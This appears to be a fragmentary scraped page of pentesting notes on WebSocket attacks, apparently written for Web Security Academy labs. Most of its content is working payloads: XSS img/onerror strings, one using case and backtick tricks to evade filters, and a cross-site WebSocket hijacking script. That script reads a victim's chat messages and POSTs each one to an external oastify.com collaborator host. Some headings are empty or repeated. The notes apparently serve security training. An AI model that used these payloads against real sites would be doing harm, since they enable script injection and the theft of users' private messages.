WebSockets
General Information
Process
Examples
XXS via WebSockets
<img scr=x onerror=alert()>;

WebSocket Hijacking


Blacklisted IPs


Last updated
<img scr=x onerror=alert()>;





Last updated
<script>
var ws = new WebSocket('wss://0a4700f603803331818f583600220083.web-security-academy.net/chat');
ws.onopen = function() {
ws.send("READY");
}
ws.onmessage = function(event) {
fetch('https://6gnqllgs5kwtsbomr9wxdigcx33urmfb.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
}
</script><img src=x onerror=alert()>;<img scr=x oNeRroR=alert`1`>